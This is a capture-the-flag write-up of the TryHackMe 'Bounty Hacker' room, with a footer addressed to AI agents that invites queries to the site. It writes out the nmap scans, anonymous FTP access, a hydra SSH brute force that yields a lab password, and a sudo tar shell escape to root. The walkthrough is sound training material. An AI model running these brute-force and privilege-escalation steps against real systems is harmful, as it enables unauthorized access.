# Bounty Hunter ![](/files/-MbDB-qCzkzn4SooRDbq) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.28.194 ``` ![](/files/-MbDBViYP0a_GcvJsRQz) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sC -sV -p 21,22,80 -oN nmap 10.10.28.194 ``` ![](/files/-MbDC6d_a2P5fbCVBYYd) ## Enumeration ### Port 21 We can see in the nmap scan that Anonymous FTP login is allowed for port 21: FTP. Lets login and see what it has. ``` ftp 10.10.28.194 ``` Once we login and check the files that it contains, we can see two files `locks.txt` and `task.txt`, lets transfer both of them onto our machine using the command `get`. ``` get ``` ![](/files/-MbDDEWaS8tDVEoCtMFd) Lets read the `task.txt` file first. ``` cat task.txt ``` ![](/files/-MbDDRVQAcABydj8Fs0m) We found a user called `lin` which is the answer to the third question. ![](/files/-MbDDYc_yiItjUpjy8ay) Now lets read the file `locks.txt` ``` cat locks.txt ``` ![](/files/-MbDDf97eEodOmCrxSXw) Looks like a password list. Now with a username and a password list, we can try bruteforcing into ssh using a tool called `hydra`. ## Initial Foothold Command Breakdown: * (**-l**): Specifying username * (**-P**): Specifying a file with passwords to crack the password. * (**ssh**): Specifying which protocol to attack. ``` hydra -l lin -P /root/Desktop/TryHackMe/BountyHacker/locks.txt 10.10.28.194 ssh ``` ![](/files/-MbDEBn8N5XMMayVjChr) We found the password `RedDr4gonSynd1cat3`. Lets login through ssh. Also the answer for the fourth question is SSH and the answer to the fifth question is the password we found using hydra. ![](/files/-MbDF6V8synaYGtIbvjn) ![](/files/-MbDFHIe9YJ5hTcOg5eJ) We have user privileges, so we can go read the `user.txt` file, which I already did, but you will have to find that on your own. :) ## Privilege Escalation Lets run the `sudo -l` command to check what files we can run as other users. ``` sudo -l ``` ![](/files/-MbDFrcdlTnDVVbFkYfp) Looks like we can run `/bin/tar` as root. Now we can go to [GTFOBins ](https://gtfobins.github.io/gtfobins/tar/#sudo)and find the commands to privilege escalate to root. The command they gave is this. ``` sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ``` Once we run this, we are root. ![](/files/-MbDGOJLNB119bAW43q9) Now you can go read the root.txt file and answer the last question. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/bounty-hunter.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.